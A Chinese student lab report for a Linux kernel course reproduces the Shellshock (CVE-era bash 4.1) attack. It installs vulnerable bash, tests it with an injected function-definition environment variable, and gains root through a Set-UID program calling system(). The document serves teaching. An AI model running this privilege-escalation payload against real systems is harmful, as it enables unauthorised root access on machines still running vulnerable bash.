2020-2021-1 202029325 《Linux内核原理与分析》第十二周作业

|这个作业属于哪个课程|<2020-2021-1Linux内核原理与分析）>|
:-: | :-: | :-:
|这个作业要求在哪里|<2020-2021-1Linux内核原理与分析第十二周作业>|
|这个作业的目标|<学习Shellsock攻击实验>| :-: | :-: | :-:
|作业正文|<2020-2021-1 202029325 《Linux内核原理与分析》第十二周作业>|

目录

• 1.实验背景
• 2.环境搭建
  • 2.1、首先安装4.1版本的bash
  • 2.2、链接一下bash
  • 2.3、检测一下是否存在shellshock漏洞
  • 2.4、让/bin/sh 指向/bin/bash.
  • 2.5、看一下shellshock漏洞的真身
• 3.正式实验
  • 3.1、首先，将/bin/sh指向/bin/bash
  • 3.2、然后新建一个shock.c文件，主要是调用一下ls命令,代码如下:
  • 3.3、编译这段代码，并设置其为Set-UID程序，保证它的所有者是root,为用户增加了s。
  • 3.4、然后退出管理员权限，执行shock,进行夺取权限的攻击

1.实验背景

Shellshock，又称Bashdoor，是在Unix中广泛使用的Bash shell中的一个安全漏洞，首次于2014年9月24日公开。许多互联网守护进程，如网页服务器，使用bash来处理某些命令，从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统——摘自维基百科

2.环境搭建

2.1、首先安装4.1版本的bash

$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure #这一步过程比较长，请等待一会
$ make && make install

2.2、链接一下bash

$ rm /bin/bash
$ ln -s /usr/local/bin/bash /bin/bash

2.3、检测一下是否存在shellshock漏洞

$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"

输出是vulnerable的话，说明有漏洞

2.4、让/bin/sh 指向/bin/bash.

$ sudo ln -sf /bin/bash /bin/sh

2.5、看一下shellshock漏洞的真身

export foo='() { :; }; echo Hello World'
bash
>Hello World

结果会输入hello world

3.正式实验

大致原理：因为system函数调用“/bin/sh -c”来运行指定的命令，这意味着/bin/bash会被调用。但是这一个版本的bash有漏洞，他会读取环境变量。

3.1、首先，将/bin/sh指向/bin/bash

$ sudo ln -sf /bin/bash /bin/sh

3.2、然后新建一个shock.c文件，主要是调用一下ls命令,代码如下:

#include <stdio.h>
void main()
{
	setuid(geteuid()); // make real uid = effective uid.
	system("/bin/ls -l");
}

3.3、编译这段代码，并设置其为Set-UID程序，保证它的所有者是root,为用户增加了s。

$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock

3.4、然后退出管理员权限，执行shock,进行夺取权限的攻击

exit
export foo='() { :; }; bash'
./shock

可以发现，这时的权限变成了管理员

去掉setuid（geteuid()）,再重复上述实验，发现夺取权限失败了

这就说明如果 real uid 和 effective uid 相同的话，定义在环境变量中的内容在该程序内有效，那样shellshock漏洞就能够被利用了。但是如果两个 uid 不同的话，环境变量失效，就无法发动攻击了